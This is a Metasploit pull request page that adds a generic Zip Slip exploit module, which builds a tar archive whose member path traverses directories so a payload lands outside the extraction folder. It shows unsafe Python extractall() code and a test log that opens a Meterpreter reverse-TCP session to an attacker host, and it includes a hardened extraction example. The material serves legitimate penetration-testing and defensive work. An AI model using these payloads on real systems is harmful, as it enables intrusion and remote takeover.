
Add Generic Exploit for Zip Slip Vulnerability #12302

Merged (3 commits, Sep 12, 2019)

Conversation

wchen-r7 (Contributor) commented Sep 9, 2019

Description

This is a generic arbitrary file overwrite technique, which typically results in remote command execution. It targets a simple yet widespread vulnerability that has been seen affecting a variety of popular products, including ones from HP, Amazon, Apache, Cisco, etc. The idea is that archive extraction libraries often have no mitigations against directory traversal attacks. If an application uses such a library, there is a risk that opening a maliciously modified archive results in the embedded payload being written to an arbitrary location (such as a web root), leading to remote code execution.

Vulnerable Application

Since this is a generic module, it does not target a specific application. However, what it targets is potentially unsafe TAR extraction libraries, so if you happen to notice one, you can consider using this.

For example, let's say you have a Python library that has code that can extract a TAR file like this:

```python
import tarfile

t = tarfile.open('example.tar')
# extractall() writes every member under its archive-supplied name,
# including names with '..' components or absolute paths.
t.extractall()
```

The above will extract a TAR file, but the extractall() function does not have any protection (especially against directory traversal attacks), so it's dangerous.

One tool that is safe from the attack is the tar command:

```
$ tar -xf msf.tar 
../payload.bin: Path contains '..'
tar: Error exit delayed from previous errors.
```

Verification Steps

  1. Save the above Python script
  2. Generate the malicious TAR file
  3. Run Python on the TAR file:

```python
import tarfile

t = tarfile.open('example.tar')
# No path check: a member named ../payload.bin lands outside the working directory.
t.extractall()
```
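A hardened counterpart to the extraction code shown above, added here as an example and not code from this PR or from the Metasploit module: it builds a constructed two-member tar in memory (one harmless entry, one named ../payload.bin), then extracts only members whose resolved path, and for links their target, stays under the destination directory. The function names build_sample_tar, is_within, safe_extractall and demo are my own.

```python
import io
import os
import tarfile
import tempfile

# Constructed sample: an in-memory tar with one harmless member and one whose
# name climbs out of the extraction directory, the pattern the module produces.
def build_sample_tar() -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as t:
        for name, data in (("safe.txt", b"hello"), ("../payload.bin", b"\x7fELF")):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def is_within(dest: str, rel: str) -> bool:
    """True if dest/rel resolves (symlinks followed) to a path inside dest."""
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, rel))
    return os.path.commonpath([dest_real, target]) == dest_real

def safe_extractall(tar_bytes: bytes, dest: str) -> tuple[list[str], list[str]]:
    """Like TarFile.extractall(), but skip members that would escape dest.
    Returns (extracted_names, rejected_names)."""
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as t:
        for m in t.getmembers():
            # Absolute names and '..' components both fail this check; realpath
            # also catches a member written through a previously extracted symlink.
            ok = is_within(dest, m.name)
            if ok and m.issym():      # symlink target is relative to the member's dir
                ok = is_within(dest, os.path.join(os.path.dirname(m.name), m.linkname))
            elif ok and m.islnk():    # hardlink target is relative to the archive root
                ok = is_within(dest, m.linkname)
            if not ok:
                rejected.append(m.name)
                continue
            t.extract(m, path=dest)
            extracted.append(m.name)
    return extracted, rejected

def demo() -> tuple[list[str], list[str], bool]:
    """Extract the sample into a temp dir; report what landed and whether
    ../payload.bin escaped to the parent directory."""
    with tempfile.TemporaryDirectory() as d:
        extracted, rejected = safe_extractall(build_sample_tar(), d)
        escaped = os.path.exists(os.path.join(d, os.pardir, "payload.bin"))
    return extracted, rejected, escaped
```

Calling demo() extracts only safe.txt and reports ../payload.bin as rejected, with nothing written to the parent directory.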
space-r7 self-assigned this Sep 11, 2019
space-r7 (Contributor) commented Sep 11, 2019

Code and docs lgtm!

Tested:

```
msf5 > use exploit/multi/fileformat/zip_slip
msf5 exploit(multi/fileformat/zip_slip) > set targetpayloadpath ../../test_prog
targetpayloadpath => ../../test_prog
msf5 exploit(multi/fileformat/zip_slip) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/zip_slip) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/zip_slip) > run

[+] msf.tar stored at /Users/space/.msf4/local/msf.tar
[*] When extracted, the payload is expected to extract to:
[*] ../../test_prog
msf5 exploit(multi/fileformat/zip_slip) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.183
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.183:40444) at 2019-09-11 12:09:26 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.183
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
Inline review comment on these lines of the module:

```ruby
path = Rex::FileUtils.normalize_unix_path(fname)
tar = StringIO.new
Rex::Tar::Writer.new(tar) do |t|
t.add_file(path, 0644) do |f|
```

space-r7 (Contributor) commented Sep 11, 2019

Looking over once more, I do have one question. Could the permissions for the payload be 0744?

wchen-r7 (Author, Contributor) commented Sep 11, 2019

Yeah, 0744 or just 777 would be better. Would you like me to fix it?

space-r7 (Contributor) commented Sep 12, 2019

I can change that before landing. Thanks!

space-r7 added a commit that referenced this pull request Sep 12, 2019
space-r7 merged commit 8fe1f9d into rapid7:master Sep 12, 2019

3 checks passed:
  1. Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  2. Metasploit Automation - Test Execution: Successfully completed all tests.
  3. continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Sep 12, 2019
space-r7 (Contributor) commented Sep 12, 2019

Release Notes

This adds an exploit module that targets archive extraction libraries. Files have the potential to be extracted to arbitrary locations if the archive extraction library does not check for directory traversal attempts. In cases such as these, it is possible to write a payload to an accessible location and achieve code execution.

tperry-r7 added the rn-modules label Oct 1, 2019